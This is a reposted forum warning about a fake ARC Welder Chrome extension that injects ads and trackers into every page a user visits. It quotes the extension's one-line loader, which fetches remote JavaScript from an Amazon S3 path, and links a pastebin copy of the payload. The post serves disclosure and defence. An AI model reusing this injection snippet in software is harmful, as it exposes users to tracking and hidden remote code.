PSA: Avoid the fake Android App Runtime (ARC Welder) extension (with over 32,000 installs!) on the Chrome Web Store, as it injects ads and trackers into every webpage you visit. It is the only one that shows up in search results and the real one appears to be installable, but delisted/"noindex"-ed

The fake one, to report: https://chrome.google.com/webstore/detail/arc-weldercom/pfpggebmpjcgdbcnhodbfgdfmipnanoh?hl=en

This almost threw me off for a bit because the real ARC Welder, which I'll link at the end of the post for convenience, doesn't seem to show up when searching using the Web Store's search. This fake one is the only result when searching for ARC Welder there. Also, it showed up for me as the top result for ARC Welder Chrome on Google Search, and the real one won't show up in Google Search at all because it has a "noindex" meta tag.

This extension inserts this insidious piece of Javascript into every site you visit:

(function(){var script=document.createElement("script");script.src="///s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js";document.head.appendChild(script);document.head.removeChild(script)})();

In its background.js this is obfuscated to avoid detection. It is pretty poorly obfuscated however.

I put the contents of that JS file (unminified) on pastebin so you don't need to go there yourself:

https://pastebin.com/1jbs7aJS

It also has a message in it like this:

<b>' + a[f].tbParams.title + '\'s development is supported by <u style="position:static">optional</u> ads</b></h4></div><div class="modal-body">' + a[f].tbParams.title + '\'s development is supported by <b>optional</b> advertisements that are added to some of the websites you visit. During the development of this extension, I\'ve put in thousands of hours adding features, fixing bugs and making things betternot mentioning the support of all the users who ask for help. blah blah blah

So this is probably generic crapware that comes with other shady chrome extensions, judging by the fact this message appeared in the shady "Imgur Uploader" extension too:

https://news.softpedia.com/news/imgur-uploader-chrome-extension-turns-to-the-dark-side-starts-injecting-ads-504629.shtml

It also inserts tons of other crap scripts from various domains into the page.

I don't have time to look through them all, but to be safe, if you had this installed while you typed in any passwords you should probably change them!

I don't know if it's against Amazon's TOS to be using AWS for this, but if anyone knows if it is then maybe that script URL can get banned too.

The real ARC Welder: https://chrome.google.com/webstore/detail/arc-welder/emfinbmielocnlhgmfkkmkngdoccbadn

It is for some reason delisted from search engines with a "noindex" meta tag, hence this shady extension's ability to get search traffic.



Submitted June 29, 2018 at 04:12PM by Walter_Bishop_PhD https://ift.tt/2NbWm3W https://ift.tt/eA8V8J

Comments

Post a Comment

Popular posts from this blog

Removable batteries discussion

I have always preferred phones with removable batteries so far, thinking that it will most certainly be the first component in a device to fail. I have even advised people in my circles to do so, until a recent event. A family member of mine still uses a HTC DesireX. Recently, he wanted to replace his battery because of swelling. He bought two matching batteries from different sellers. The problem is, even though they were unopened/sealed packages of original batteries, they were not holding much charge. (I suppose they waited on a shelf for some time.) This made me question myself. In the past, I have used nokia smartphones, and they were easy to replace with fresh batteries, since almost all nokias used the same battery type. Now with android, its all over the place. Is it even worth it to go for a removable battery device when you cant find a replacement a couple of years after you purchase it? What do you think/prefer? PS. I realize this is not exactly fault of android OS, but ...
Read more